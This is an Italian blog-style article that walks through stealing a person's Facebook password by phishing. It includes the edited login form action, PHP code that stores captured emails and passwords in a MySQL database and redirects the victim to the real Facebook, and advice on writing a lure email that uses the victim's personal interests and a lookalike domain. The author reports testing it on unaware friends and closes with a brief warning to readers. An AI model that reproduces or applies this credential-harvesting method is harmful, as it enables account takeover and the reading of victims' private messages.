Il team di Facebook ha riscritto da solo il runtime di Php, quindi non è composto da quattro pirla che permettono al primo scemo che spia la sua ragazza di bucargli il sistema. Non esistono dunque programmi “hacker” che sfruttano buchi di Facebook. Non esistono proprio buchi di facebook, se non quelli che si porta addosso il lui o la lei che volete spiare. Ma quelli non sono violabili per via software, lì ci vuole proprio hardware. Meglio non divagare.
Il virus peggiore per un computer si trova tra la sedia ed il monitor. Questo è il principio che deve guidarci nell’attacco da sferrare alla nostra vittima. Kevin Mitnick, storico e famoso hacker, ci insegna che per ottenere informazioni sensibili il metodo migliore è l‘Ingegneria sociale. Questa disciplina si basa sullo studio dei comportamenti della persona, per poi riuscire a carpirgli le informazioni che vogliamo. Facebook ha attirato a sé non solo gli utenti medi, facilmente raggirabili, ma anche gli utenti stupidi, che sono quasi un libro aperto. Partendo da questi principi, e con un po’ di savoir faire in campo web, fregare password su facebook non è più una impresa titanica. Ho testato questo metodo su un campione dei miei (ignari) amici, e funziona nel 10% dei casi. Ma i miei amici sono selezionati, quindi ho solo un 10% di tonti, che mi sono premurato di avvertire della loro vulnerabilità.
Ingegneria sociale + utonto= Phishing
Un primo semplice approccio potrebbe essere la domanda: “quale password hai?”. Funziona bene nei casi in cui la password è “fattiicazzituoi82″. Altrimenti le cose si complicano un po’. Ciò che ci serve è il Phishing: una canna, un’esca, e l’utente abboccherà. Quando arriva una mail da qualche banca o dalle poste che vi allerta su soldi che stanno sparendo dal vostro conto, quello è Phishing: cliccando sul link proposto si arriverà ad un sito simile a quello delle Poste, dove inserirete nome utente e password. Siete voi dunque a consegnare la vostra password al pirata romeno (sono il popolo migliore in questo campo). Per rubare questa benedetta password di Facebook, dobbiamo dunque far abboccare l’utente.
Come prima cosa, dobbiamo crearci il nostro simil Facebook, dove attirare i nostri pesci. Per gli addetti ai lavori basta una frase: dump della pagina Facebook di login su un proprio server, mail esca con link al nostro server. Ecco invece una specie di Howto per i meno ferrati in materia: iniziamo dai requisiti.
Per creare il nostro simil Facebook, che per fare i fichi chiameremo Fakebook, necessitiamo di un web server (Apache) e di un database (Mysql). I ragazzi svegli che usano Mac o Linux li hanno già installati, quelli più tonti che hanno ancora windows dovranno installarseli da soli. Fortuna vuole che è cosa semplice, basta farsi un giro su Wampserver.
Una volta installato il nostro server, dobbiamo metterci il nostro Fakebook. Andiamo alla pagina iniziale di facebook, senza essere loggati, e copiamo il sorgente sul nostro editor di testo preferito (Notepad? sei un loser). Detto sorgente altro non è che una pagina php, dobbiamo modificarla in modo da fare sì che il nome utente e la password che verranno digitati su Fakebook siano salvati da qualche parte. Se conoscete il funzionamento di un form HTML, questa è la modifica da fare:
<form method="POST" action="http://localhost/login.php" id="login_form">
In pratica va cambiato l’indirizzo indicato da “action”.Il secondo passo è creare la pagina login.php, che sarà quella con cui verranno catturati i dati inviati dal nostro utonto.
Poche semplici righe per fare il tutto:
$user="you"; $password="tube"; $database="fish"; $name=$_POST['email']; $pass= $_POST['pass']; mysql_connect(localhost,$user,$password); @mysql_select_db($database) or die( "Unable to select database"); $query="Insert into pesci(nome,pass) value('$name','$pass')"; mysql_query($query); header("location: http://www.facebook.com/inbox/?ref=mb");
Chi mastica il php capisce che queste righe sono banali. Prendo i dati inviati dalla pagina di Fakebook e li schiaffo su una tabella del database. L’ultima riga rimanda alla vera pagina della posta di Facebook e serve a rendere credibile il Phishing,di cui ora va introdotto il “flusso di lavoro”.
Abbocca bello, abbocca
Creato il nostro Fakebook, ora dobbiamo attirarci la nostra vittima. Va dunque predisposta una mail simile a quella che manda Facebook. Qui entra in gioco l’ingegneria sociale: l’obiettivo è fare sì che l’utente clicchi sul link della mail che gli mandiamo. Per ottenere ciò, la mail deve essere interessante per la vittima. Ad esempio sappiamo che alla nostra vittima, Mario, piace Nunziatina. Anche se non lo sappiamo basta dare uno sguardo alla sua bacheca e vedere con chi interagisce di più. Per attirare Mario dovremo mandargli una mail simile:
Il link fakebook.homedns.com/n/inbox/Readmessage.php?… porta ovviamente dritto dritto alla pagina di Fakebook creata prima e che risiede sul server di casa nostra. Per creare un nome simile basta un qualsiasi servizio di Redirect.
Mario, vedendo che Nunziatina gli scrive andrà a cliccare per vedere il messaggio. Il link non porta però a Facebook, ma al nostro Fakebook. Mario metterà la password per entrare e leggere il messaggio inviato dalla bella Nunziatina, e il nostro Fakebook preleverà tali dati, per poi redirigere Mario, senza che se ne accorga, alla sua casella di posta su Facebook. Certo, lì non troverà nessun messaggio, ma in fondo fb non fa altro che dire “ops! Si è verificato un problema!”. Mario penserà che è il solito errore, e non starà lì a far caso a dove ha inserito la sua password.
Ecco dunque rubata la password Facebook ad un povero innocente. Ora possiamo guardare i suoi messaggi privati e scoprire i suoi altarini. Bel guadagno.
Quali sono i punti deboli sfruttati con questa procedura?
1)Interesse di Mario nel leggere qualsiasi cosa gli scriva Nunziatina. C’è una larga fetta di utenti che ha sete di attenzione.
2)Mario non fa caso al link, ad una prima occhiata sempre la solita mail di facebook, quindi clicca senza problemi. Nunziatina è più importante del controllo del link.
3)Mario ha fretta di leggere, non sta a guardare la barra degli indirizzi su cui sta scritto Fakebook anziché Facebook.
4)Facebook ha spesso comportamenti strani, è un sistema in continua evoluzione e funziona grazie ad un’orgia di Javascript. Mario lo sa, e non fa molto caso se in realtà non ha ricevuto nessun messaggio.
Sveglia che è giorno
L’unico metodo per rubare una password Facebook è insomma quello di farsela consegnare direttamente dalla vittima. Non esistono altre vie, come non esiste una applicazione che vi dice in quanti visitano il vostro profilo, o altre amenità simili. Su facebook gira la più grande massa di navigatori in italia, ancora più di ebay o altro. Se su ebay le truffe verso i più “sempliciotti” sono all’ordine del giorno, su Facebook si può fare ancora di peggio. Ora che sapete come potrebbero rubare i vostri segreti, cercate di starvene accorti, che gli avvocati divorzisti non aspettano altro che un vostro flirt via internet.